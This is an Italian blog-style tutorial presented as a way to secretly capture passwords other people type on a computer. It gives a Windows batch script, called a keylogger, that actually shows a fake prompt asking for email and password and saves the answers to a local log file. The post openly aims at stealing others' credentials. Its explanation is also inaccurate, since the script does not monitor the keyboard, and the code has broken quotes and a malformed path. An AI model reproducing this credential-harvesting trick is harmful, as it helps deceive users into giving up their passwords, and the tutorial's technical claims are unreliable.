Quanti di voi si sono sempre chiesti se sia possibile impossessarsi delle password digitate da alcuni utenti sul proprio PC? La risposta è semplice, basta usare un Keylogger; in informatica un Keylogger è uno strumento hardware o software in grado di effettuare lo sniffing della tastiera di un computer, cioè è in grado di intercettare e catturare segretamente tutto ciò che viene digitato sulla tastiera senza che l'utente si accorga di essere monitorato. [Fonte Wikipedia]. Oggi vi mostreremo come creare un Keylogger utilizzando il Blocco note. 
Il tutto è davvero semplice, basta creare un nuovo documento di testo cliccando con il tasto desto del mouse sul Desktop Nuovo--> Documento di testo (vedi immagine) e copiare il seguente testo:



@echo off
color a
title Keylogger
cls
echo Please Enter Your Email Address And Password
echo.
echo.
set /p user=Username:
set /p pass=Password:
echo Username="%user%” Password=”%pass%" >> C:\Logs\Log.txt
pause
start >>Program Here<<
cd "C:Logs"
exit
Una volta copiato il testo dobbiamo salvare il tutto, ma attenzione, bisogna cambiare l'estensione del file da .txt a .bat (vedi foto), bisogna rinominare il file in: Logs.bat


Ora non ci resta che creare una cartella nella root principale del nostro hard disk, quindi rechiamoci in Risorse del computer--> disco locale C: e qui creiamo una nuova cartella rinominandola in "Logs", il nome della cartella deve obbligatoriamente essere Logs altrimenti il programma non funzionerà!

Il nostro Keylogger ora è pronto, possiamo avviare il fila Logs.bat, alla chiusura noteremo che il testo digitato sarà stato salvato automaticamente in un file di testo all'interno della cartella Logs.
Axact

Axact

Vestibulum bibendum felis sit amet dolor auctor molestie. In dignissim eget nibh id dapibus. Fusce et suscipit orci. Aliquam sit amet urna lorem. Duis eu imperdiet nunc, non imperdiet libero.

Lascia un Commento: